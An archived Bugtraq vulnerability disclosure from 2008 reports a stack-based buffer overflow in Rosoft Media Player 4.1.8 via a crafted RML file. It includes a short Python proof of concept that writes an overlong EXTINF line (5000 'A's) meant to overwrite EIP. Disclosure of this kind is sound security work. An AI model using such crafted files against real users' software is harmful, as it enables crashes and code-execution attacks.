lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080315022302.30456.qmail@securityfocus.com>
Date: 15 Mar 2008 02:23:02 -0000
From: opexoc@...il.com
To: bugtraq@...urityfocus.com
Subject: Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow

Description:
This is nothing special - there is just flaw in Rosoft Media Player 4.1.8, similar to one discovered by Juan Pablo Lopez Yacubian. 
This one concerns RML file. This is Stack Based Buffer Overflow vulerability - we can ovewrite EIP. I hope that it was not reported before. 

Author: Wiktor Sieroci&#324;ski
POC:

#!/usr/bin/python

content = (
"#EXTINF:Played=0\n" + "A" * 5000 + "\n"
)

fd = open("music.rml","w");
fd.write(content)
fd.close();

print "RML FILE CREATED"
     

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ